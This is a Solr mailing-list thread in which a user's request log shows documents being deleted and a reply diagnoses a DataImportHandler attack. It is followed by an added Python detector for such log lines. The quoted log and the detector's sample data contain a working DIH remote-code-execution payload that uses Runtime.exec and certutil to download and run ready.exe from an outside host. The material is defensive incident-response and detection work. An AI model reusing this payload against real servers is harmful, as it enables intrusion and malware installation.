Your system is under attack: something is trying to hack into it via
Solr, possibly a cryptominer or similar, and it is using the DIH endpoint
for it.

Shawn explained the most likely cause for Solr actually deleting the
records. I would also suggest:
1) Figure out where the request is coming from and treat it as a
threat. If it is internal, they are infected. If they are external and
consistent, maybe they need to be blocked, etc.
2) Check that your system has not been infected already by looking for
weird processes. I guess if you are not on Windows, that particular
line is not a threat, but the attack may have had several methods.
3) If you are not using the dataimporthandler, remove it from
solrconfig.xml. Or rename it (though that will lose the Admin UI interface).
Or firewall-block access to it...

Regards,
   Alex.

On Thu, 26 Sep 2019 at 08:42, Neha <neha.gu...@uni-jena.de> wrote:
>
> Hello SOLR Users,
>
> Today I noticed that in my Solr 6.6.0 instance documents are
> getting deleted automatically.
>
> In the Solr traces I found the lines below, and it seems it is because of this.
>
>
> 2019-09-26 09:01:21.599 INFO  (qtp225493257-14) [   x:Ecotron]
> o.a.s.c.S.Request [xyz]  webapp=/solr path=/dataimport
> params={cmd.exe+/c+C:/Windows/temp/ready.exe");%0a++++++++++}%0a++]]></script>%0a++<document>%0a++++<entity+name%3D"stackoverflow"%0a++++++++++++url%3D"https://stackoverflow.com/feeds/tag/solr"%0a++++++++++++processor%3D"XPathEntityProcessor"%0a++++++++++++forEach%3D"/feed"%0a++++++++++++transformer%3D"script:poc"+/>%0a++</document>%0a</dataConfig>=&core=atom&debug=true&indent=on&commit=true&name=dataimport&dataConfig=<dataConfig>%0a++<dataSource+type%3D"URLDataSource"/>%0a++<script><![CDATA[%0a++++++++++function+poc(){+java.lang.Runtime.getRuntime().exec("cmd.exe+/c+certutil.exe+-urlcache+-split+-f+http://www.jukesxdbrxd.xyz/ready.exe+C:/Windows/temp/ready.exe&clean=true&wt=json&command=full-import&_=1565530241159&verbose=false}
> status=500 QTime=94
> 2019-09-26 09:01:21.599 ERROR (qtp225493257-14) [   x:Ecotron]
> o.a.s.s.HttpSolrCall
> null:org.apache.solr.handler.dataimport.DataImportHandlerException: Data
> Config problem: XML document structures must start and end within the
> same entity.
>
>
> Also the "dataimport.properties" file of each core is getting updated
> with something like the below:
>
> *stackoverflow.last_index_time=2019-09-26 08\:24\:11*
>
>
> Is there some configuration which I am missing? I request you to please
> help me with this, as I am clueless why this is happening.
>
> Thanks for your support!!
>
>
> Regards
>
> Neha Gupta
>
>
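As an added example (not code from the thread or from the Solr project), here is a small Python detector that turns the request-log line Neha posted into a finding. It URL-decodes the `params={...}` map, looks for the DIH indicators visible in that line (a dataConfig supplied in the request, an inline `<script>`, a `script:` transformer, `Runtime.exec`, `certutil`, `cmd.exe`), flags `full-import` with `clean=true` because that is what deletes the existing documents, and pulls out the download URL, the dropped file path and the exec command as indicators of compromise. The first sample line is the log entry from the post re-joined onto one line; the other two sample lines, the indicator patterns and the severity ranking are this example's own constructions, not anything Solr ships.

```python
"""Flag DataImportHandler (DIH) abuse in Solr request-log lines.

Added example for this thread; not code from Solr or from anyone in the thread.
The indicator patterns and severity ranking are this example's own choices.
"""
import re
from urllib.parse import unquote_plus

# Constructed sample log. The first line is the request-log entry from Neha's post,
# re-joined onto one line; the other two lines are made up here for contrast.
ATTACK_LINE = (
    '2019-09-26 09:01:21.599 INFO  (qtp225493257-14) [   x:Ecotron] o.a.s.c.S.Request [xyz]  '
    'webapp=/solr path=/dataimport params={'
    'cmd.exe+/c+C:/Windows/temp/ready.exe");%0a++++++++++}%0a++]]></script>%0a++<document>%0a'
    '++++<entity+name%3D"stackoverflow"%0a++++++++++++url%3D"https://stackoverflow.com/feeds/tag/solr"'
    '%0a++++++++++++processor%3D"XPathEntityProcessor"%0a++++++++++++forEach%3D"/feed"'
    '%0a++++++++++++transformer%3D"script:poc"+/>%0a++</document>%0a</dataConfig>='
    '&core=atom&debug=true&indent=on&commit=true&name=dataimport&dataConfig=<dataConfig>%0a'
    '++<dataSource+type%3D"URLDataSource"/>%0a++<script><![CDATA[%0a++++++++++function+poc(){'
    '+java.lang.Runtime.getRuntime().exec("cmd.exe+/c+certutil.exe+-urlcache+-split+-f'
    '+http://www.jukesxdbrxd.xyz/ready.exe+C:/Windows/temp/ready.exe'
    '&clean=true&wt=json&command=full-import&_=1565530241159&verbose=false'
    '} status=500 QTime=94'
)
BENIGN_QUERY = ('2019-09-26 09:02:00.001 INFO  (qtp225493257-15) [   x:Ecotron] o.a.s.c.S.Request [xyz]  '
                'webapp=/solr path=/select params={q=*:*&wt=json} status=0 QTime=3')
DIH_STATUS = ('2019-09-26 09:02:05.010 INFO  (qtp225493257-16) [   x:Ecotron] o.a.s.c.S.Request [xyz]  '
              'webapp=/solr path=/dataimport params={command=status&wt=json} status=0 QTime=1')
SAMPLE_LOG = "\n".join([ATTACK_LINE, BENIGN_QUERY, DIH_STATUS])

# Shape of an o.a.s.c.S.Request line; params={...} is logged as one URL-encoded map.
REQUEST_RE = re.compile(
    r"^(?P<ts>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d\.\d+) .*?o\.a\.s\.c\.S\.Request .*?"
    r"path=(?P<path>\S+) params=\{(?P<params>.*)\} status=(?P<status>\d+) QTime=\d+"
)
# (weight, label, pattern) applied to the decoded params; higher weight = stronger evidence of RCE.
INDICATORS = (
    (3, "Java Runtime.exec() call", re.compile(r"Runtime\.getRuntime\(\)\.exec\(")),
    (3, "certutil -urlcache download (LOLBin)", re.compile(r"certutil(?:\.exe)?\s+-urlcache", re.I)),
    (3, "cmd.exe invocation", re.compile(r"\bcmd\.exe\b", re.I)),
    (2, "ScriptTransformer referenced by an entity", re.compile(r'transformer="script:', re.I)),
    (2, "inline <script> block in dataConfig", re.compile(r"<script\b", re.I)),
    (1, "dataConfig supplied in the request", re.compile(r"(?:^|&)dataConfig=")),
)
SEVERITY = {0: "low", 1: "medium", 2: "high", 3: "critical"}
EXEC_RE = re.compile(r'\.exec\(\s*"([^"&]*)')            # the string handed to Runtime.exec
URL_RE = re.compile(r"""https?://[^\s"'<>)&]+""")
PATH_RE = re.compile(r"""\b[A-Za-z]:[\\/][^\s"'<>)&]+""")  # Windows drop paths such as C:/Windows/temp/x.exe


def _param(raw, name):
    """Value of one query parameter from the raw (still URL-encoded) params map."""
    for pair in raw.split("&"):
        key, _, value = pair.partition("=")
        if key == name:
            return unquote_plus(value)
    return None


def analyze_line(line):
    """Return a finding dict for one request-log line, or None if it is uninteresting."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    raw = m.group("params")
    decoded = unquote_plus(raw)
    hits = [(w, label) for w, label, rx in INDICATORS if rx.search(decoded)]
    # DIH's full-import defaults to clean=true, which deletes every existing document first.
    if _param(raw, "command") == "full-import" and _param(raw, "clean") in (None, "true"):
        hits.append((1, "full-import with clean=true: existing documents are deleted first"))
    if m.group("path") != "/dataimport" and not hits:
        return None                      # ordinary query, nothing DIH-related
    exec_m = EXEC_RE.search(decoded)
    return {
        "timestamp": m.group("ts"),
        "path": m.group("path"),
        "status": int(m.group("status")),
        "severity": SEVERITY[max((w for w, _ in hits), default=0)],
        "indicators": [label for _, label in sorted(hits, reverse=True)],
        "command": exec_m.group(1).strip() if exec_m else None,
        "urls": sorted(set(URL_RE.findall(decoded))),
        "paths": sorted(set(PATH_RE.findall(decoded))),
    }


def scan_log(text):
    """All findings for a whole request log, in file order."""
    return [f for f in map(analyze_line, text.splitlines()) if f]


if __name__ == "__main__":
    import sys
    source = open(sys.argv[1], encoding="utf-8", errors="replace").read() if len(sys.argv) > 1 else SAMPLE_LOG
    for f in scan_log(source):
        print(f"{f['timestamp']} {f['severity'].upper():8} {f['path']} status={f['status']}")
        for label in f["indicators"]:
            print("   -", label)
        if f["command"]:
            print("   exec:", f["command"])
        for item in f["urls"] + f["paths"]:
            print("   ioc: ", item)
```

Run it with the path to a Solr log file as the only argument, or with no argument to see the sample. Two things the output makes concrete for Alex's checklist: the `o.a.s.c.S.Request` line carries no client address, so step 1 means correlating the timestamp with the Jetty request log or with whatever proxy sits in front of Solr; and in this particular line the exec string is cut off at the first `&`, which is why the XML failed to parse and the request returned 500, but any full-import that does parse runs with `clean=true` (the default) and deletes the existing documents before anything is re-indexed, which fits the `stackoverflow.last_index_time` entries appearing in dataimport.properties.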
